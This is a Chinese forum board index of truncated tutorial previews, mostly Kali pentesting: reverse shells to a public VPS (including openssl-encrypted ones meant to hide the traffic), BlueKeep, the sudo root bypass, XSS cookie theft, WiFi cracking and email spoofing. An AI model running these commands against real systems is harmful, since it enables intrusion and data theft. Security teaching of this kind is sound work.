建站VPS工具综合杂谈
网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。
365个主题在此版面
-
漏洞介绍2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。 从微软官方的消息一出,各大安全厂商都开始发布了漏洞预警,那段时间我也一直在找对应的POC,但要不就是不能利用的POC,要不就是利用以前漏洞写的POC,更有甚着点击attack后给你惊喜。 靶场环境漏洞环境,我当时就是虚拟机装了Windows7 SP1的系统, 001使用VM安装Windows7 SP1模拟受害机 Windows7 SP1下载链接(这里的靶机是使用清水表哥提供的win7sp1的系统):迅雷下载ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/ 云盘下载:Windows7 X64下载链接:链接: https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg 提取码: fiwx 002 msf配置 下载cve_2019_0708_bluekeep_rce.rb到msf的配置文件/usr/share/metasploit-framework/modules/exploits…
-
- 0 篇回复
- 29 次查看
-
-
设备清单天翼网关魅族路由器(老毛子固件)网线若干 路由模式一由于现在的光猫都支持wifi功能,所以很大程度上已经省略了路由器。但是由于光猫的WiFi功率比较小,有时候我们需要添加一个路由器,今天来看看如何添加路由器。 基于传统的宽带拨号方式(新旧光猫通用)先看看线路连接 光猫千兆口————路由WAN口 然后登陆路由器,配置上网方式为PPOP拨号填写宽带账号和密码,保存即可。 需要注意的是电信用户如果配置好不能上网的话,需要打人工客户激活下。 基于光猫路由一体的串联方式(适合新光猫)如果你的光猫支持WiFi功能,此时你可以将其看做是一个路由器。(说白了就是将猫和路由器合二为一) 这时,我们可以用最简单的方式连接路由器(二级路由器) 先看看线路 将路由器的上网方式设置为动态IP即可! 注意事项如果已经设置过拨号上网,请将光猫端口插到百兆口或iptv端口,因为千兆口已占用。修改你的路由器的DHCP服务器地址,不要和光猫的192.168.0.1/192.168.1.1冲突。
-
- 0 篇回复
- 30 次查看
-
-
环境说明公网服务器一台kali (内网) 简单的测试在公网服务器执行命令 nc -lvvp 4444kali中执行命令 -i >& /dev/tcp/公网ip/5555 0>&1启动Wireshark开启抓包,分析流量。 测试我们在终端中随便输入一条命令ifconfig,然后到Wireshark中查看。 我们可以清楚的看到,终端流量是通过明文传送。那么如何保证安全呢,这需要我们对明文流量加密处理。 openssl加密传输第一步,在vps上生成SSL证书的公钥/私钥对 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes第二步,在VPS监听反弹shell openssl s_server -quiet -key key.pem -cert cert.pem -port 4433第三步,在目标上用openssl加密反弹shell的流量 mkfifo /tmp/s;/bin/ -i < /tmp/s 2>&1|openssl s_client -quiet -connect vps:443 > /tmp/s;rm /tmp/s 流量已经被加密。
-
- 0 篇回复
- 31 次查看
-
-
给主题添加自定义样式:将以下代码添加到主题的自定义CSS里(Handsome主题在:控制台--外观--设置外观--开发者设置--自定义CSS,复制到框中即可,其他主题找到合适的位置放置) /*视频挂载*/ .iframe_video { position: relative; width: 100%; } @media only screen and (max-width: 767px) { .iframe_video { height: 15em; } } @media only screen and (min-width: 768px) and (max-width: 991px) { .iframe_video { height: 20em; } } @media only screen and (min-width: 992px) and (max-width: 1199px) { .iframe_video { height: 30em; } } @media only screen and (min-width: 1200px) { .iframe_video { height: 40em; } } .iframe_cross { position: relative; width: 100%; height: 0; padding-bot…
-
- 0 篇回复
- 35 次查看
-
-
什么是社会工程学社会工程学(Social Engineering)认为人为因素才是安全的软肋。很多企业、公司在信息安全上投入大量的资金,最终导致数据泄露的原因,往往却是发生在人本身。你们可能永远都想象不到,对于黑客们来说,通过一个用户名、一串数字、一串英文代码,社会工程师就可以通过这么几条的线索,通过社工攻击手段,加以筛选、整理,就能把你的所有个人情况信息、家庭状况、兴趣爱好、婚姻状况、你在网上留下的一切痕迹等个人信息全部掌握得一清二楚。虽然这个可能是最不起眼,而且还是最麻烦的方法。一种无需依托任何黑客软件,更注重研究人性弱点的黑客手法正在兴起,这就是社会工程学黑客技术。 开始攻击启动setoolkit终端执行setoolkit即可启动,效果如下: 先来看看菜单 Select from the menu: 1) Social-Engineering Attacks (社会工程攻击) 2) Penetration Testing (Fast-Track) (渗透测试(快速通道)) 3) Third Party Modules(第三方模块) 4) Update the Social-Engineer Toolkit(更新社会工程师工具包) 5) Update SET configuration(更新集配置) 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkit 我们选择1进入社会工程学攻击模块 界面菜单如下: 菜单翻…
-
- 0 篇回复
- 12 次查看
-
-
Nessus介绍Nessus 是目前全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件。 下载安装包因为kali之基于Debian深度开发,我们按照相应是系统位数下载即可。 需要注意的是i386是32位系统。 温馨提示! 请用Google浏览器下载因为!因为!因为!因为!因为!贼J快!快!快!快!快!快!快! 安装贼J 13简单,把下载的Nessus-8.6.0-debian6_amd64.deb复制到kali。执行命令即可 dpkg -i Nessus-8.6.0-debian6_amd64.deb 启动服务sudo service nessusd startps:注意nessusd是启动服务,而不是启动程序。 获取激活码方法一 然后打开这个网页:https://www.tenable.com/products/nessus-home 随便输入,邮箱保证能收到邮件就好了。 方法二 运行程序后,在软件框输入 在邮箱中获取激活码 运行程序在kali的浏览器中输入https://localhost:8834/ 会提示证书错误信息,添加证书即可。 效果如下: 选择第一个 如果你选择了第一种方法获取激活码,这里直接点击跳过即可。 输入刚才我们邮箱中的激活码点击下一步 然后是漫长的等待…… 核能提示! 如果失败!请多次重试!重试!重试!(因为贼J 13慢) 如果你运气好的话,很安装成功哦~ 输入刚才我们设置的密码,登录系统!
-
- 0 篇回复
- 24 次查看
-
-
启动服务service nussusd start在浏览器中输入https://127.0.0.1:8834 ps会提示错误信息,这是因为https 证书的问题,点击高级选项,忽略或者添加证书即可。 如图,输入账号和密码,登录nussus 新建扫描点击右上角的new scan 设置目标地址 以及相应的插件是否开启(默认开启) 查看结果扫描完成后,点击刚才的项目。可以看到当前系统中漏洞情况。 漏洞利用看看windows中的一些高危漏洞。选择下方的编号。在msfconsole中搜索模块,利用即可。 利用成功效果
-
- 0 篇回复
- 17 次查看
-
-
设备清单esp8266开发板oled显示器杜邦线 电路图 连线示意图 显示器连接 VCC----3V3(+) GND----GND(-) SCL----D1 SOA----D2 传感器示意图 VCC----3V3(+) GND----GND(-) OUT----D5 实物连接图安装库文件Installing the OLED libraries依次打开Sketch > Include Library > Manage Libraries 搜索SSD1306然后安装 搜索GFX安装 搜索DHT 搜索Adafruit Unified Sensor 实例代码/********* Rui Santos Complete project details at https://randomnerdtutorials.com *********/ #include <Wire.h> #include <Adafruit_GFX.h> #include <Adafruit_SSD1306.h> #include <Adafruit_Sensor.h> #include <DHT.h> #define SCREEN_WIDTH 128 // OLED display width, in pixels #define SCREEN_HEIGHT 64 // OLED display height, in pixels // Declaration for an …
-
- 0 篇回复
- 32 次查看
-
-
漏洞详情sudo错误的处理了某些用户id.攻击者可以以根用户身份执行任意命令。使得非root用户不需要知道root密码,就可以执行root才能执行的命令。 系统平台kali-Linux 软件版本1.8.27 漏洞利用首先我们新建一个用户test 然后执行visudo命令添加规则,使得test用户可以执行任意命令 test ALL=(ALL:ALL) ALL 语法 sudo -u root 要执行的命令 示例:我们用直接用账号test查看/etc/shadow提示如下! 这是因为test是非root用户,不能查看有root权限的文件,但是我们执行下面命令: 切换用户su test $ sudo -u root cat /etc/shadow效果如下: 也就是说,在我们不知道root账号密码的情况下,我们执行的root命令。 漏洞修复更新sudo到最新版本1.8.28即可。
-
- 0 篇回复
- 28 次查看
-
-
安装安装方法(phpstudy for linux V0.2公测版) 使用 SSH 连接工具 连接到您的 Linux服务器后,根据系统执行相应命令开始安装(大约2分钟完成面板安装): Centos安装脚本 yum install -y wget && wget -O install.sh https://download.xp.cn/install.sh && sh install.sh Ubuntu安装脚本 wget -O install.sh https://download.xp.cn/install.sh && sudo install.sh Deepin安装脚本 wget -O install.sh https://download.xp.cn/install.sh && sudo install.sh Debian安装脚本 wget -O install.sh https://download.xp.cn/install.sh && sudo install.sh 安装成功后如下: 访问登录后台登录界面简而朴实 防火墙报表 还是很漂亮的。 防火墙配置
-
- 0 篇回复
- 37 次查看
-
-
GoAccess是一个基于终端的快速日志分析器。其核心思想是实时快速分析和查看Web服务器统计信息,而无需使用您的浏览器(如果您希望通过SSH快速分析访问日志,或者只是喜欢在终端中工作),终端输出是默认输出,但它能够生成完整的,独立的实时 HTML报告(非常适合分析,监控和数据可视化),以及a JSON和CSV报告。 首先来看看效果 安装环境centos7 (7.2)goaccess 1.3(1.3版本支持中文) 安装安装依赖yum install ncurses-devel geoip-devel libmaxminddb-devel tokyocabinet-devel openssl-devel 解压安装wget https://tar.goaccess.io/goaccess-1.3.tar.gz tar -xzvf goaccess-1.3.tar.gz cd goaccess-1.3/ ./configure --enable-utf8 --enable-geoip=legacy make make install输入goaccess -V 提示下图,证明安装成功。 牛刀小试生成日志文件 goaccess -f access_log --log-format=COMBINED -a >/root/priess.html
-
- 0 篇回复
- 25 次查看
-
-
写在前面在很早之前,就想写一篇与WiFi相关的文章。奈何工作的事情比较多,又静不下心来写。今天终于耐不住手痒,来写一篇关于WiFi安全的文章。希望通过这篇文章能够引起大家对WiFi安全的重视,需要声明的是,本篇文章包含一定的攻击思路,请且行且珍惜。 分析常用的WiFi破解手段密码破解大法 顾名思义,就是我们准备一个密码字典,然后通过相关软件捕获WiFi的数据包,通过跑包获取密码。WiFi钓鱼 我们可以去尝试搭建一个和目标一样的SSID 在通过洪水攻击,使其不能使用。通过宿主连接钓鱼WiFi从而获取密码。社会工程学 叫声大爷你家WiFi密码是啥来着? 开始正题,来看看拥有一个复杂密码是多么的重要。 基于传统的字典方式破解前期准备:usb无线网卡(芯片为3070或8187如果是5Gwifi 需要8122系列)kali linux(或其他debian系列的) 插入网卡查看网卡状态执行ifconfig或iwconfig查看状态 可以看到,我们的无线网卡已经成功的加载完成。 问题处理: 1,没有wlan0,这是因为网卡没有挂起,执行ifconfig wlan0 up挂起即可!2,执行上诉命令报错, 执行iwconfig查看有没有无线网卡(一般为wlan0 wlan1等等),如果没有证明网线网卡驱动有问题,请安装驱动。如果上诉所讲成功执行,恭喜!你可以接着装逼了。 开启monitor模式执行命令airmon-ng start wlan0 执行完毕后,我们执行ifconfig查看网卡,会变成wlan0mon这样我们的监听模式开启完毕! 扫描周伟…
-
- 0 篇回复
- 43 次查看
-
-
安装下载地址: 链接:https://pan.baidu.com/s/1ZeU_rOXgnvPY8PbqbJiuxw 提取码:sn57 默认安装 根据电脑情况等待片刻 点击关闭 需要注意的是,我们直接打开软件会出现闪退的情况。需要到Photoshop的安装目录运行Photoshop_Original绑定我们的账号即可。
-
- 0 篇回复
- 28 次查看
-
-
XXE 是什么介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将注意力集中于外部实体中,而不要被 XML 中其他的一些名字相似的东西扰乱了思维(盯好外部实体就行了),如果能注入 外部实体并且成功解析的话,这就会大大拓宽我们 XML 注入的攻击面(这可能就是为什么单独说 而没有说 XML 注入的原因吧,或许普通的 XML 注入真的太鸡肋了,现实中几乎用不到) 相关背景XML是一种非常流行的标记语言,在1990年代后期首次标准化,并被无数的软件项目所采用。它用于配置文件,文档格式(如OOXML,ODF,PDF,RSS,...),图像格式(SVG,EXIF标题)和网络协议(WebDAV,CalDAV,XMLRPC,SOAP,XMPP,SAML, XACML,...),他应用的如此的普遍以至于他出现的任何问题都会带来灾难性的结果。 XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD(document type definition) 的东西控制的,他就是长得下面这个样子 ?xml version="1.0"…
-
- 0 篇回复
- 34 次查看
-
-
视频不能播放的,用360或者GOOGLE浏览器查看本文! 什么是xssXSS是一种发生在Web前端的漏洞,所以其危害的对象也主要是前端用户。 XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、盗取用户cookie,甚至对主机进行远程控制。 XSS攻击类型危害:存储型 > 反射型 > DOM型 反射型:交互的数据一般不会被存在数据库里面,一次性,所见即所得,一般出现在查询页面等 存储型:交互的数据会被存在数据库里面,永久性存储,一般出现在留言板,注册等页面 DOM型:不与后台服务器产生数据交互,是一种通过DOM操作前端代码输出的时候产生的问题,一次性,也属于反射型 XSS形成原因形成XSS漏洞的主要原因是程序中输入和输出的控制不够严格。导致“精心构造”的脚本输入后,在输出到前端时被浏览器当作有效代码解析执行 反射型XSS(get)我们首先打开Pikachu右键审查元素。 我们看到对文本框的最大长度做出了限制,修改maxlength="20"即可。 payload <script>alert("kali博客")</script> 可以干什么——盗取Cookie修改/pikachu/pkxss/inc/config.inc.php 中的数据库信息访问 http://localhost/pikachu ,访问管理工具里的XSS后台,初始化数据库。 登录到后台界面 修改/var/www/html/pikachu/pkxss/xcookie下的cookie.php,将IP地址改为漏洞服务器的地址 cooki…
-
- 0 篇回复
- 28 次查看
-
-
前言在平时我们玩耍的时候,都是在PC机或者在虚拟机上运行的。但是这样有一个缺陷,就是我们在外出的时候或者不方便用PC的时候没有设备让我们玩。同时不少小伙伴在玩msf中很头疼如何玩转外网的shell。除了以前说过的利用端口映射外,在看看如何用vps玩外网shell。 什么是vpsvps(Virtual Private Server 虚拟专用服务器)将一台服务器分割成多个虚拟专享服务器的优质服务。实现VPS的技术分为容器技术,和虚拟化技术 [1] 。在容器或虚拟机中,每个VPS都可分配独立公网IP地址、独立操作系统、实现不同VPS间磁盘空间、内存、CPU资源、进程和系统配置的隔离,为用户和应用程序模拟出“独占”使用计算资源的体验。 说了一大堆,就是一台云服务器 购买vps有钱就行 常见的vps主机商(阿里云 百度云 腾讯云 又拍云 七牛云等等)这里推荐vulter原因很简单…… 环境说明这里笔者购买了一台百度云的vps 系统为centos7 安装nmapyum install nmap当然你也可以参考官方的教程,安装nmap的最新版 测试 nmap -O bbskali.cn 安装sqlmap先安装Python yum install python -y如果已安装,请忽略。 安装sqlmap cd /usr/src git clone https://github.com/sqlmapproject/sqlmap.git]https://github.com/sqlmapproject/sqlmap.git cd sqlmap ./sq…
-
- 0 篇回复
- 35 次查看
-
-
首先我们来了解下什么是公网什么是内网。所谓外网就是广域网。广域网(英语:Wide Area Network,缩写为 WAN),又称外网、公网。是连接不同地区局域网或城域网计算机通信的远程网。内网就是局域网(Local Area Network,LAN)是指在某一区域内由多台计算机互联成的计算机组。如学校、医院、公安的网络。或者家庭中几台计算机组成的网络。而在实际情况中,外网一般有运营商提供服务,内网有一台路由器即可组建。比如你的手机和电脑在连接同一WiFi时,就处于同一局域网。现在我们来说说两者的区别! 对于公网ip可以所有人访问,如淘宝的服务器。而内网ip只能在同一局域网内的设备访问,如同一WiFi下的手机可以访问电脑。 现在我们思考我们shell的问题? 我们平时在利用msfvenom生成shell的时候,有这样一步 填写kali的ip地址和端口。 LHOST=192.168.232.195 LPORT=5555 这里的ip地址就是我们内网的ip。也就是只有我们内网的设备才能访问到192.168.232.195而外网的设备无法访问。那么我们该如何生成外网的shell呢?姿势一 调戏运营商客户获取公网ip此方法因地域成功率也不高,有的地方是绝对不可能给你的。如xj而东南沿海一般可以试试。通过和客户沟通,说你设备要绑定公网ip,各种调戏各种软磨硬泡或许会给你绑定。如果此方法不同,可以试试下面方法;故意将家中网络搞坏,叫人工报修。师傅会上门处理,这时给师傅一盒中华和师傅拉拉家常,会有意想不到的结果。因为报修师傅地位很低,通常是按处理的工单给…
-
- 0 篇回复
- 17 次查看
-
-
Swaks是一个功能强大,灵活,可编写脚本,面向事务的SMTP测试工具, 目前Swaks托管在私有svn存储库中。官方项目页面是http://jetmore.org/john/code/swaks/牛刀小试kali下默认自带,无需安装。 01 测试邮箱的连通性 swaks --to [email protected] 返回250ok,说明该邮箱存在,并且可以正常收信。 利用SMTP发送邮件 swaks --to 收件箱@qq.com --from 发件箱@163.com --body HI这是 由kali发送到您邮件中的内容 --header "Subject: kali论坛 致力于网络安全" --server smtp.163.com -p 25 -au 发件箱@163.com -ap SMTP密码在测试之前,在163官网开启smtp 命令说明: --from [email protected] //发件人邮箱; --ehlo qq.com //伪造邮件ehlo头,即是发件人邮箱的域名。提供身份认证 --body "http://www.baidu.com" //引号中的内容即为邮件正文; --header "Subject:hello" //邮件头信息,subject为邮件标题 --data ./Desktop/email.txt //将正常源邮件的内容保存成TXT文件,再作为正常邮件发送 发送附件 swaks --to 收件箱@qq.com --from 发件箱@163.com --body HI这是 由kali发送到您邮件中的内容 -…
-
- 0 篇回复
- 28 次查看
-
-
Office 2019 Microsoft Office 2019于今年9月28日正式发布,不过仅支持WIN10系统,我想大家首先想知道的就是2019版增加了哪些新功能亮点,让我们先来一起看一下吧! 亮点1:标签切换动画 Office 2019增加了很多界面特效动画,其中标签动画便是其中最吸引人的一个。每当我们点击一个Ribbon面板时,Office都会自动弹出一个动画特效。整体感觉很像是Win10特有的窗口淡入与淡出。从实际使用情况来看,新增加的过渡特效不仅没有对性能进行拖累,还给人了一种界面切换流畅的感觉,让人耳目一新。 标签切换动画 亮点2:内置IFS等新函数 Excel 2019内置了几款新函数,比如”IFS”多条件判断、”CONCAT”多列合并、“TEXTJOIN“多区域合并等等。以”IFS“举例,条件判断一般我们会选择IF,当条件多于两种时就需要多组IF函数进行嵌套。要是嵌套的层级过多,不仅书写上会有麻烦,后期排错也会相当繁琐。 相比之下,IFS则是将多个条件并列展示,语法结构类似于“IFS(条件1,结果,条件2,结果,条件3,结果,……)”,最多可支持127个不同条件,算得上是给IF函数开挂了! 亮点3:在线插入图标 制作PPT时我们常会使用一些图标,大多数图标结构简单、传达力强,却并不好找。最新版Office 2019则增加了在线图标插入功能,让我们可以像插入图片一样一键插入图标。从试用情况看,Office 2019的在线图标库还是蛮丰富的,分为“人物“、”技术与电子“、”通讯“、“商业”、“分析”、“商贸”、“教育”…
-
- 0 篇回复
- 14 次查看
-
-
前期的准备kali linux(2019.4)VM15(文末提供下载地址)牛X的电脑(推荐配置 i7处理器 16G内存 1T硬盘 最好将kali安装在固态盘中) 准备好这些东西,我们就可以愉快的玩耍了! 首先我们到kali官网下载最新版的kaliImage NameTorrentVersionKali Linux 64-BitTorrent2019.4Kali Linux 32-BitTorrent2019.4对于下载,不少的小伙伴说下载慢。这很正常,毕竟是国外的服务器。笔者这里是电信网络下载速度最高5M五分钟就下载完成了。 vm安装kali01 启动虚拟机,点击新建虚拟机——自定义 02在兼容性我们尽量选高一点,这里我们选15.x。 03 选择稍后安装系统(也可以直接选定第二个安装程序的iso的位置) 04 因为kali是基于Debian深度开发的,这里我们选Linux下的debian系列 05 设置虚拟机的名称和虚拟机的位置(不要讲虚拟机放到默认目录C盘,否则会占用20-40g的系统空间。) 06 设置处理器的数量(最少2核 树莓派可以1核 核数越高 处理能力越强) 07 设置内存 (2G起步) 08 网络设置 默认NAT 这时,我们基本设置完成,其余选择直接点击下一步完成即可。 09 点击刚才建立的虚拟机,设置镜像的文件位置。 10 启动虚拟机,点击 Graphical install(图形化安装) 11 选择语言 12 设置主机的名称 默认为kali 13 填写域名 (留空即可) 14 设置k…
-
- 0 篇回复
- 15 次查看
-
-
首先来看看GURB的效果 登录界面的效果 如何修改修改gurb boot进入kali,切换到文件目录cd//boot/grub/themes/kali/分别修改grub-4x3.png和grub-16x9.png这两个图片即可。注意图片格式为png大小像素不能发生变化。 修改登录背景修改文件/usr/share/backgrounds/kali/下的kali-light-16x9.png和kali-light-4x3.png即可。其他的根据分辨率自行修改。 PS:在修改的过程中,一定要注意图片的分辨率问题,这里建议将原图拖动到ps中,做覆盖处理即可,注意图片的格式为png。
-
- 0 篇回复
- 20 次查看
-
-
题记当今社会,网络技术飞速发展。但是面临的信息安全问题越来越突出,信息泄露、个人的隐私被曝光、聊天记录被监听等等。通常我们会在各种平台上看到一些类似于阅后即焚效果的网站。很大程度上保护了我们的隐私,但是真真的是阅后即焚吗?比如 你发的朋友圈,在删除了这条朋友圈,你确定在服务器上真实删除了吗?结果就不为人知了? 利用kali安装阅后即焚,实现真正意义的保护个人隐私。 首先启动apacher 和mysql service apache2 start service mysql start由于kali是默认安装了apacher mysql php7.3我们就跳过具体的安装过程了! 配置mysql kali自带mysql配置 kali是自带mysql服务,今天我们来看看,如何配置mysql。启动myslqservice mysql sta... 根据上诉文章,配置好mysql的登录账号。登录mysql创建数据库!mysql -u root -p #登录数据库 create database yue; #创建了一个名为yue的数据库 show databases; #显示当前创建的数据库 复制源码下载源码 ,复制到/var/www/html 对文件进行解压 unzip PasteBurn.zip 将解压的文件复制到根目录 修改配置文件config.php 域名这里我们填写kali的ip地址 安装在浏览器中执行 http://kali ip/install.php即可完成安装! 但是,我们这样搭建后,只能通过内网设备…
-
- 0 篇回复
- 15 次查看
-
-
视频演示 环境准备python2.7Kali 2019.4无线网卡弱口令字典 安装模块pip install pywifi注:没有没有安装pip先安装pip 安装命令: apt-get install python-pip部分代码解读: 导入模块 from pywifi import * import time import sys def main(): #扫描时常 scantimes = 3 #单个密码测试延迟 testtimes = 15 output = sys.stdout #结果文件保存路径 files = "TestRes.txt" #字典列表 keys = open(sys.argv[1],"r").readlines() print "|KEYS %s"%(len(keys)) #实例化一个pywifi对象 wifi = PyWiFi() #选择定一个网卡并赋值于iface iface = wifi.interfaces()[0] #通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置 scanres = scans(iface,scantimes) #统计附近被发现的热点数量 nums = len(scanres) print "|SCAN GET %s"%(nums) print "%s\n%-*s| %-*s| %-*s| %-*s…
-
- 0 篇回复
- 17 次查看
-
-
网站基本信息收集网站域名、子域名收集域名解析ip查询网站所有人(whois)负责人联系方式网站基于那个CMS搭建 1x01 网站域名子域名收集这里,我们以本站一级域名bbskali.cn为例,简单看看网站子域名信息的收集。这里介绍几个kali中自带的子域名查询工具。 利用dnsmap查询子域名! dnsmap bbskali.cn 利用fierce查询子域名 fierce -dns bbskali.cn 子域名收集的意义: 假设,我们的主站bbskali.cn通过测试,没有任何可下手的地方。但是我们可以通过旁站的漏洞拿下主站。 ip地址查询查询ip的意义: 通过ip地址,我们可以知道目前的站点开启了哪些端口,以及系统等信息。 方式一:利用ping查询 如,我们要查询www.baidu.com解析到哪个ip地址,执行命令: ping baidu.com当然这种方法针对开启了防PING和加了CDN的域名是无效的。 针对CND域名,我们可以利用国外的VPS去ping,因为大多数站长仅开启了国内的加速。 利用获取到的ip地址,我们利用Nmap扫一波,即可得到当前开启的端口。 whois查找这里,我们可以利用站长工具获取当前站长的相关信息。当然也可以在kali中直接执行whois命令直接获取。 whois baidu.com cms查询方式一:利用云悉查询 方式二:利用kali工具whatweb查询 whatweb 目标 网站目录爬虫通过对网站目录扫描,我们可以得到一些很重要的信息,比如网站的登录后台。 利用dirsearch扫描网站目录 执行命…
-
- 0 篇回复
- 14 次查看
-
-
前期的准备树莓派4b16G U盘 读卡器kali2019.4镜像网线一根 老夫的树莓派 树莓派正面 组装树莓派需要注意树莓派风扇的连线,脚针如下图: 组装后的效果: 开始刷入系统在 https://www.offensive-security.com/kali-linux-arm-images/ 中,找到RaspberryPi Foundation,根据自己的需要下载镜像 插入内存卡,写入镜像。 点亮你的树莓派将写好的内存卡装载到树莓派中,插入电源!插入网线!由于我没有买屏幕(主要是贵)。我们用ssh连接树莓派。 登录路由器,查看树莓派的ip地址! 打开Xshell连接树莓派。 需要注意的是: 主机名:kali的ip地址 用户名:root 密码:toor 如下:成功连接 配置vnc由于没有屏幕,我们可以按照vnc进行远程桌面。 apt-get install tightvncserver注意:kali2019.4是默认安装的 配置tightvncserver 在终端输入tightvncserver 会提示输入密码,我们输入我们的密码(需要注意的是,这个密码是vnc连接的密码。) 连接vnc主机名:ip:1 用户名:root 密码:刚才自己输入的密码 注意ip后面必须填写:1 下载vnc软件,进行连接。手机效果! 启动命令为 vncserver :1 设置中文在命令行输入”dpkg-reconfigure locales”。 进入图形化界面之后,(空格是选择,Tab是切换,*是选中),选中en_US.UTF-8和zh_CN.U…
-
- 0 篇回复
- 31 次查看
-